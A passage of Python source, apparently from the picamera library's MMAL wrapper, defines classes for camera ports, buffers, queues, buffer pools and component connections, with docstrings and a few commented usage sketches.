return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. The callback should return ``True`` when processing is
complete and no further calls are expected (e.g. at frame-end for an
image encoder), and ``False`` otherwise.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
if not self._stopped and callback(self, buf):
self._stopped = True
finally:
buf.release()
try:
self._pool.send_buffer(block=False)
except PiCameraPortDisabled:
# The port was disabled, no point trying again
pass
# Workaround: There is a bug in the MJPEG encoder that causes a
# deadlock if the FIFO is full on shutdown. Increasing the encoder
# buffer size makes this less likely to happen. See
# raspberrypi/userland#208. Connecting the encoder component resets the
# output port's buffer size, hence why we correct this here, just
# before enabling the port.
if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
if callback:
assert self._stopped
assert self._pool is None
self._stopped = False
self._pool = MMALPortPool(self)
try:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
# If this port is an output port, send it all the buffers
# in the pool. If it's an input port, don't bother: the user
# will presumably want to feed buffers to it manually
if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
self._pool.send_all_buffers(block=False)
except:
self._pool.close()
self._pool = None
self._stopped = True
raise
else:
super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
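# Hypothetical usage sketch (not part of the original module): enabling an
# output port with a callback. The callback receives the port and an
# MMALBuffer, and returns True once it has seen the final buffer (after which
# no further callbacks are expected). 'port' and 'output' are assumed to exist
# in the caller's context.
#
#     def _callback(port, buf):
#         output.write(buf.data)
#         return bool(buf.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END)
#
#     port.enable(_callback)
#     ...                          # wait for the capture to finish
#     port.disable()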
class MMALVideoPort(MMALPort):
"""
Represents an MMAL port used to pass video data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALVideoPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size,
self.framesize, self.framerate)
else:
return '<MMALVideoPort closed>'
def _get_framesize(self):
return PiResolution(
self._port[0].format[0].es[0].video.crop.width,
self._port[0].format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._port[0].format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = int(value.width)
video.crop.height = int(value.height)
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the port's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_framerate(self):
video = self._port[0].format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
assert video.frame_rate.num == 0
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._port[0].format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
class MMALAudioPort(MMALPort):
"""
Represents an MMAL port used to pass audio data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALAudioPort closed>'
class MMALSubPicturePort(MMALPort):
"""
Represents an MMAL port used to pass sub-picture (caption) data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALSubPicturePort closed>'
class MMALPortParams(object):
"""
Represents the parameters of an MMAL port. This class implements the
:attr:`MMALControlPort.params` attribute.
Internally, the class understands how to convert certain structures to more
common Python data-types. For example, parameters that expect an
MMAL_RATIONAL_T type will return and accept Python's
:class:`~fractions.Fraction` class (or any other numeric types), while
parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
structures will be treated as plain ints.
Parameters that expect more complex structures will return and expect
those structures verbatim.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPortParams, self).__init__()
self._port = port
def __getitem__(self, key):
dtype = PARAM_TYPES[key]
# Use the short-cut functions where possible (teeny bit faster if we
# get some C to do the structure wrapping for us)
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
}.get(dtype, mmal.mmal_port_parameter_get)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_get:
result = dtype(
mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
)
mmal_check(
func(self._port, result.hdr),
prefix="Failed to get parameter %d" % key)
else:
dtype = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
}[dtype]
result = dtype()
mmal_check(
func(self._port, key, result),
prefix="Failed to get parameter %d" % key)
return conv(result)
def __setitem__(self, key, value):
dtype = PARAM_TYPES[key]
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
}.get(dtype, mmal.mmal_port_parameter_set)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_set:
mp = conv(value)
assert mp.hdr.id == key
assert mp.hdr.size >= ct.sizeof(dtype)
mmal_check(
func(self._port, mp.hdr),
prefix="Failed to set parameter %d to %r" % (key, value))
else:
mmal_check(
func(self._port, key, conv(value)),
prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
"""
Represents an MMAL buffer header. This is usually constructed from the
buffer header pointer and is largely supplied to make working with
the buffer's data a bit simpler. Using the buffer as a context manager
implicitly locks the buffer's memory and returns the :mod:`ctypes`
buffer object itself::
def callback(port, buf):
with buf as data:
# data is a ctypes uint8 array with size entries
print(len(data))
Alternatively you can use the :attr:`data` property directly, which returns
and modifies the buffer's data as a :class:`bytes` object (note this is
generally slower than using the buffer object unless you are simply
replacing the entire buffer)::
def callback(port, buf):
# the buffer contents as a byte-string
print(buf.data)
"""
__slots__ = ('_buf',)
def __init__(self, buf):
super(MMALBuffer, self).__init__()
self._buf = buf
def _get_command(self):
return self._buf[0].cmd
def _set_command(self, value):
self._buf[0].cmd = value
command = property(_get_command, _set_command, doc="""\
The command set in the buffer's meta-data. This is usually 0 for
buffers returned by an encoder; typically this is only used by buffers
sent to the callback of a control port.
""")
def _get_flags(self):
return self._buf[0].flags
def _set_flags(self, value):
self._buf[0].flags = value
flags = property(_get_flags, _set_flags, doc="""\
The flags set in the buffer's meta-data, returned as a bitmapped
integer. Typical flags include:
* ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
* ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
* ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
* ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimation data
""")
def _get_pts(self):
return self._buf[0].pts
def _set_pts(self, value):
self._buf[0].pts = value
pts = property(_get_pts, _set_pts, doc="""\
The presentation timestamp (PTS) of the buffer, as an integer number
of microseconds or ``MMAL_TIME_UNKNOWN``.
""")
def _get_dts(self):
return self._buf[0].dts
def _set_dts(self, value):
self._buf[0].dts = value
dts = property(_get_dts, _set_dts, doc="""\
The decoding timestamp (DTS) of the buffer, as an integer number of
microseconds or ``MMAL_TIME_UNKNOWN``.
""")
@property
def size(self):
"""
Returns the length of the buffer's data area in bytes. This will be
greater than or equal to :attr:`length` and is fixed in value.
"""
return self._buf[0].alloc_size
def _get_offset(self):
return self._buf[0].offset
def _set_offset(self, value):
assert 0 <= value <= self.size
self._buf[0].offset = value
self.length = min(self.size - self.offset, self.length)
offset = property(_get_offset, _set_offset, doc="""\
The offset from the start of the buffer at which the data actually
begins. Defaults to 0. If this is set to a value which would force the
current :attr:`length` off the end of the buffer's :attr:`size`, then
:attr:`length` will be decreased automatically.
""")
def _get_length(self):
return self._buf[0].length
def _set_length(self, value):
assert 0 <= value <= self.size - self.offset
self._buf[0].length = value
length = property(_get_length, _set_length, doc="""\
The length of data held in the buffer. Must be less than or equal to
the allocated size of data held in :attr:`size` minus the data
:attr:`offset`. This attribute can be used to effectively blank the
buffer by setting it to zero.
""")
def _get_data(self):
with self as buf:
return ct.string_at(
ct.byref(buf, self._buf[0].offset),
self._buf[0].length)
def _set_data(self, value):
value_len = buffer_bytes(value)
if value_len:
if value_len > self.size:
raise PiCameraValueError(
'data is too large for buffer (%d > %d)' % (
value_len, self.size))
bp = ct.c_uint8 * value_len
try:
sp = bp.from_buffer(value)
except TypeError:
sp = bp.from_buffer_copy(value)
with self as buf:
ct.memmove(buf, sp, value_len)
self._buf[0].offset = 0
self._buf[0].length = value_len
data = property(_get_data, _set_data, doc="""\
The data held in the buffer as a :class:`bytes` string. You can set
this attribute to modify the data in the buffer. Acceptable values
are anything that supports the buffer protocol, and which contains
:attr:`size` bytes or less. Setting this attribute implicitly modifies
the :attr:`length` attribute to the length of the specified value and
sets :attr:`offset` to zero.
.. note::
Accessing a buffer's data via this attribute is relatively slow
(as it copies the buffer's data to/from Python objects). See the
:class:`MMALBuffer` documentation for details of a faster (but
more complex) method.
""")
def replicate(self, source):
"""
Replicates the *source* :class:`MMALBuffer`. This copies all fields
from the *source* buffer, including the internal :attr:`data` pointer.
In other words, after replication this buffer and the *source* buffer
will share the same block of memory for *data*.
The *source* buffer will also be referenced internally by this buffer
and will only be recycled once this buffer is released.
.. note::
This is fundamentally different to the operation of the
:meth:`copy_from` method. It is much faster, but imposes the burden
that two buffers now share data (the *source* cannot be released
until the replicant has been released).
"""
mmal_check(
mmal.mmal_buffer_header_replicate(self._buf, source._buf),
prefix='unable to replicate buffer')
def copy_from(self, source):
"""
Copies all fields (including data) from the *source*
:class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
store :attr:`length` bytes from the *source* buffer. This method
implicitly sets :attr:`offset` to zero, and :attr:`length` to the
number of bytes copied.
.. note::
This is fundamentally different to the operation of the
:meth:`replicate` method. It is much slower, but afterward the
copied buffer is entirely independent of the *source*.
"""
assert self.size >= source.length
source_len = source._buf[0].length
if source_len:
with self as target_buf, source as source_buf:
ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
self._buf[0].offset = 0
self._buf[0].length = source_len
self.copy_meta(source)
def copy_meta(self, source):
"""
Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
copies all buffer fields with the exception of :attr:`data`,
:attr:`length` and :attr:`offset`.
"""
self._buf[0].cmd = source._buf[0].cmd
self._buf[0].flags = source._buf[0].flags
self._buf[0].dts = source._buf[0].dts
self._buf[0].pts = source._buf[0].pts
self._buf[0].type[0] = source._buf[0].type[0]
def acquire(self):
"""
Acquire a reference to the buffer. This will prevent the buffer from
being recycled until :meth:`release` is called. This method can be
called multiple times in which case an equivalent number of calls
to :meth:`release` must be made before the buffer will actually be
released.
"""
mmal.mmal_buffer_header_acquire(self._buf)
def release(self):
"""
Release a reference to the buffer. This is the opposing call to
:meth:`acquire`. Once all references have been released, the buffer
will be recycled.
"""
mmal.mmal_buffer_header_release(self._buf)
def reset(self):
"""
Resets all buffer header fields to default values.
"""
mmal.mmal_buffer_header_reset(self._buf)
def __enter__(self):
mmal_check(
mmal.mmal_buffer_header_mem_lock(self._buf),
prefix='unable to lock buffer header memory')
return ct.cast(
self._buf[0].data,
ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
def __exit__(self, *exc):
mmal.mmal_buffer_header_mem_unlock(self._buf)
return False
def __repr__(self):
if self._buf is not None:
return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
''.join((
'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
)), {
0: 'none',
mmal.MMAL_EVENT_ERROR: 'error',
mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
mmal.MMAL_EVENT_EOS: 'end-of-stream',
}[self.command], self.length)
else:
return '<MMALBuffer object: ???>'
class MMALQueue(object):
"""
Represents an MMAL buffer queue. Buffers can be added to the queue with the
:meth:`put` method, and retrieved from the queue (with optional wait
timeout) with the :meth:`get` method.
"""
__slots__ = ('_queue', '_created')
def __init__(self, queue):
self._created = False
self._queue = queue
@classmethod
def create(cls):
self = cls(mmal.mmal_queue_create())
self._created = True
return self
def close(self):
if self._created:
mmal.mmal_queue_destroy(self._queue)
self._queue = None
def __len__(self):
return mmal.mmal_queue_length(self._queue)
def get(self, block=True, timeout=None):
"""
Get the next buffer from the queue. If *block* is ``True`` (the default)
and *timeout* is ``None`` (the default) then the method will block
until a buffer is available. Otherwise *timeout* is the maximum time to
wait (in seconds) for a buffer to become available. If a buffer is not
available before the timeout expires, the method returns ``None``.
Likewise, if *block* is ``False`` and no buffer is immediately
available then ``None`` is returned.
"""
if block and timeout is None:
buf = mmal.mmal_queue_wait(self._queue)
elif block and timeout is not None:
buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
else:
buf = mmal.mmal_queue_get(self._queue)
if buf:
return MMALBuffer(buf)
def put(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the back of the queue.
"""
mmal.mmal_queue_put(self._queue, buf._buf)
def put_back(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the front of the queue. This is
used when a buffer was removed from the queue but needs to be put
back at the front where it was originally taken from.
"""
mmal.mmal_queue_put_back(self._queue, buf._buf)
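# Illustrative sketch (not part of the original module): a standalone queue can
# be created to shuttle buffers between producers and consumers; get() blocks
# until put() supplies a buffer, or until the timeout expires. 'buf' is assumed
# to be an MMALBuffer obtained elsewhere.
#
#     q = MMALQueue.create()
#     q.put(buf)
#     same_buf = q.get(timeout=1)   # waits up to 1 second, else returns None
#     q.close()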
class MMALPool(object):
"""
Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
ports are associated with a pool of buffers, and a queue. Instances can be
treated as a sequence of :class:`MMALBuffer` objects but this is only
recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
:meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
the encapsulated :class:`MMALQueue`.
"""
__slots__ = ('_pool', '_queue')
def __init__(self, pool):
self._pool = pool
super(MMALPool, self).__init__()
self._queue = MMALQueue(pool[0].queue)
def __len__(self):
return self._pool[0].headers_num
def __getitem__(self, index):
return MMALBuffer(self._pool[0].header[index])
@property
def queue(self):
"""
The :class:`MMALQueue` associated with the pool.
"""
return self._queue
def close(self):
if self._pool is not None:
mmal.mmal_pool_destroy(self._pool)
self._pool = None
def resize(self, new_count, new_size):
"""
Resizes the pool to contain *new_count* buffers with *new_size* bytes
allocated to each buffer.
*new_count* must be 1 or more (you cannot resize a pool to contain
no headers). However, *new_size* can be 0 which causes all payload
buffers to be released.
.. warning::
If the pool is associated with a port, the port must be disabled
when resizing the pool.
"""
mmal_check(
mmal.mmal_pool_resize(self._pool, new_count, new_size),
prefix='unable to resize pool')
def get_buffer(self, block=True, timeout=None):
"""
Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
for the meaning of the parameters.
"""
return self._queue.get(block, timeout)
def send_buffer(self, port, block=True, timeout=None):
"""
Get a buffer from the pool's queue and send it to *port*. *block* and
*timeout* act as they do in :meth:`get_buffer`. If no buffer is
available (for the given values of *block* and *timeout*),
:exc:`~picamera.PiCameraMMALError` is raised.
"""
buf = self.get_buffer(block, timeout)
if buf is None:
raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
port.send_buffer(buf)
def send_all_buffers(self, port, block=True, timeout=None):
"""
Send all buffers from the queue to *port*. *block* and *timeout* act as
they do in :meth:`get_buffer`. If no buffer is available (for the given
values of *block* and *timeout*), :exc:`~picamera.PiCameraMMALError` is
raised.
"""
for i in range(len(self._queue)):
self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
"""
Construct an MMAL pool for the number and size of buffers required by
the :class:`MMALPort` *port*.
"""
__slots__ = ('_port',)
def __init__(self, port):
pool = mmal.mmal_port_pool_create(
port._port, port._port[0].buffer_num, port._port[0].buffer_size)
if not pool:
raise PiCameraMMALError(
mmal.MMAL_ENOSPC,
'failed to create buffer header pool for port %s' % port.name)
super(MMALPortPool, self).__init__(pool)
self._port = port
def close(self):
if self._pool is not None:
mmal.mmal_port_pool_destroy(self._port._port, self._pool)
self._port = None
self._pool = None
super(MMALPortPool, self).close()
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_all_buffers(port, block, timeout)
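# Hypothetical usage sketch (not part of the original module): when an output
# port is enabled with a callback, MMALPort.enable() builds an MMALPortPool and
# hands all of its buffers to the port; each buffer comes back through the
# callback and is returned to the pool, so the caller rarely touches the pool
# directly. Feeding an enabled input port manually follows this pattern, where
# 'port' is the input port and 'frame_bytes' is caller-supplied data:
#
#     buf = port.get_buffer()       # draws from the port's pool
#     buf.data = frame_bytes
#     port.send_buffer(buf)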
class MMALBaseConnection(MMALObject):
"""
Abstract base class for :class:`MMALConnection` and
:class:`MMALPythonConnection`. Handles weakrefs to the source and
target ports, and format negotiation. All other connection details are
handled by the descendent classes.
"""
__slots__ = ('_source', '_target')
default_formats = ()
compatible_opaque_formats = {
('OPQV-single', 'OPQV-single'),
('OPQV-dual', 'OPQV-dual'),
('OPQV-strips', 'OPQV-strips'),
('OPQV-dual', 'OPQV-single'),
('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
}
def __init__(
self, source, target, formats=default_formats):
super(MMALBaseConnection, self).__init__()
if not isinstance(source, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('source is not a port')
if not isinstance(target, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('target is not a port')
if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
raise PiCameraValueError('source is not an output port')
if target.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError('target is not an input port')
if source.connection is not None:
raise PiCameraValueError('source port is already connected')
if target.connection is not None:
raise PiCameraValueError('target port is already connected')
if formats is None:
formats = ()
self._source = source
self._target = target
try:
iter(formats)
except TypeError:
formats = (formats,)
self._negotiate_format(formats)
source._connection = self
target._connection = self
# Descendents continue with connection implementation...
def close(self):
if self._source is not None:
self._source._connection = None
self._source = None
if self._target is not None:
self._target._connection = None
self._target = None
def _negotiate_format(self, formats):
def copy_format():
self._source.commit()
self._target.copy_from(self._source)
self._target.commit()
def max_buffers():
self._source.buffer_count = self._target.buffer_count = max(
self._source.buffer_count, self._target.buffer_count)
self._source.buffer_size = self._target.buffer_size = max(
self._source.buffer_size, self._target.buffer_size)
# Filter out formats that aren't supported on both source and target
# ports. This is a little tricky as ports that support OPAQUE never
# claim they do (so we have to assume it's mutually supported)
mutually_supported = (
set(self._source.supported_formats) &
set(self._target.supported_formats)
) | {mmal.MMAL_ENCODING_OPAQUE}
formats = [f for f in formats if f in mutually_supported]
if formats:
# If there are any formats left to try, perform the negotiation
# with the filtered list. Again, there's some special casing to
# deal with the incompatible OPAQUE sub-formats
for f in formats:
if f == mmal.MMAL_ENCODING_OPAQUE:
if (self._source.opaque_subformat,
self._target.opaque_subformat) in self.compatible_opaque_formats:
self._source.format = mmal.MMAL_ENCODING_OPAQUE
else:
continue
else:
self._source.format = f
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
continue
else:
max_buffers()
return
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to negotiate port format')
else:
# If no formats are available to try (either from filtering or
# because none were given), assume the source port is set up
# properly. Just copy the format to the target and hope the caller
# knows what they're doing
try:
copy_format()
except PiCameraMMALError as e:
if e.status != mmal.MMAL_EINVAL:
raise
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'failed to copy source format to target port')
else:
max_buffers()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
@property
def source(self):
"""
The source :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._source
@property
def target(self):
"""
The target :class:`MMALPort` or :class:`MMALPythonPort` of the
connection.
"""
return self._target
class MMALConnection(MMALBaseConnection):
"""
Represents an MMAL internal connection between two components. The
constructor accepts arguments providing the *source* :class:`MMALPort` and
*target* :class:`MMALPort`.
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
.. note::
The default *formats* list starts with OPAQUE; the class understands
the different OPAQUE sub-formats (see :ref:`mmal` for more information)
and will only select OPAQUE if compatible sub-formats can be used on
both ports.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALConnection` object
sending the data, and the :class:`MMALBuffer` object containing data. The
callable may optionally manipulate the :class:`MMALBuffer` and return it
to permit it to continue traversing the connection, or return ``None``
in which case the buffer will be released.
.. note::
There is a significant performance penalty for specifying a
callback between MMAL components as it requires buffers to be
copied from the GPU's memory to the CPU's memory and back again.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between MMAL components.
"""
__slots__ = ('_connection', '_callback', '_wrapper')
default_formats = (
mmal.MMAL_ENCODING_OPAQUE,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not isinstance(source, MMALPort):
raise PiCameraValueError('source is not an MMAL port')
if not isinstance(target, MMALPort):
raise PiCameraValueError('target is not an MMAL port')
super(MMALConnection, self).__init__(source, target, formats)
self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
self._callback = callback
flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
if callback is None:
flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
try:
mmal_check(
mmal.mmal_connection_create(
self._connection, source._port, target._port, flags),
prefix="Failed to create connection")
except:
self._connection = None
raise
def close(self):
if self._connection is not None:
mmal.mmal_connection_destroy(self._connection)
self._connection = None
self._wrapper = None
super(MMALConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return bool(self._connection[0].is_enabled)
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
def wrapper(connection):
buf = mmal.mmal_queue_get(connection[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
modified_buf = self._callback(self, buf)
except:
buf.release()
raise
else:
if modified_buf is not None:
try:
self._target.send_buffer(modified_buf)
except PiCameraPortDisabled:
# Target port disabled; ignore the error
pass
else:
buf.release()
return
buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
if buf:
buf = MMALBuffer(buf)
try:
self._source.send_buffer(buf)
except PiCameraPortDisabled:
# Source port has been disabled; ignore the error
pass
if self._callback is not None:
self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
self._connection[0].callback = self._wrapper
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
mmal_check(
mmal.mmal_connection_enable(self._connection),
prefix="Failed to enable connection")
if self._callback is not None:
MMALPool(self._connection[0].pool).send_all_buffers(self._source)
def disable(self):
"""
Disables the connection.
"""
mmal_check(
mmal.mmal_connection_disable(self._connection),
prefix="Failed to disable connection")
self._wrapper = None
@property
def name(self):
return self._connection[0].name.decode('ascii')
def __repr__(self):
if self._connection is not None:
return '<MMALConnection "%s">' % self.name
else:
return '<MMALConnection closed>'
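# Illustrative sketch (not part of the original module): wiring the camera's
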